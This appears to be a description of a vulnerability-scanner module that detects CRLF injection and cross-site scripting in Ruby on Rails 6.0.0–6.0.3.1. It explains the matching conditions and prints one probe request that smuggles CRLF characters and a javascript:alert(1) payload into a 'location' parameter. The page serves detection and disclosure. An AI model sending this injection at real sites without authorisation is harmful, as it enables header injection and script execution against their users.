Ruby on Rails - CRLF Injection and Cross-Site Scripting

What is the "Ruby on Rails - CRLF Injection and Cross-Site Scripting?" module?

The "Ruby on Rails - CRLF Injection and Cross-Site Scripting" module is designed to detect a vulnerability in Ruby on Rails 6.0.0-6.0.3.1 that allows for CRLF injection and cross-site scripting attacks. This vulnerability can be exploited to inject JavaScript into the response, potentially leading to unauthorized access or data theft. The severity of this vulnerability is classified as medium.

This module was authored by ooooooo_q, rootxharsh, and iamnoooob.

Impact

If successfully exploited, the CRLF injection and cross-site scripting vulnerability in Ruby on Rails can have serious consequences. Attackers can inject malicious JavaScript code into the response, which can then be executed by unsuspecting users visiting the affected website. This can lead to various security issues, including unauthorized access, data theft, and the potential for further exploitation.

How does the module work?

The "Ruby on Rails - CRLF Injection and Cross-Site Scripting" module works by sending HTTP requests to the target application and analyzing the responses for specific conditions. It checks for the presence of JavaScript injection in the response body, a status code of 302 (indicating a redirect), and specific headers in the response, such as "Location: aaaaa" and "text/html".

Here is an example of an HTTP request used by the module:

POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa

The module then evaluates the matching conditions to determine if the vulnerability is present. If all conditions are met, it reports the vulnerability.

For more information, you can refer to the HackerOne report related to this vulnerability.

Metadata: max-request: 1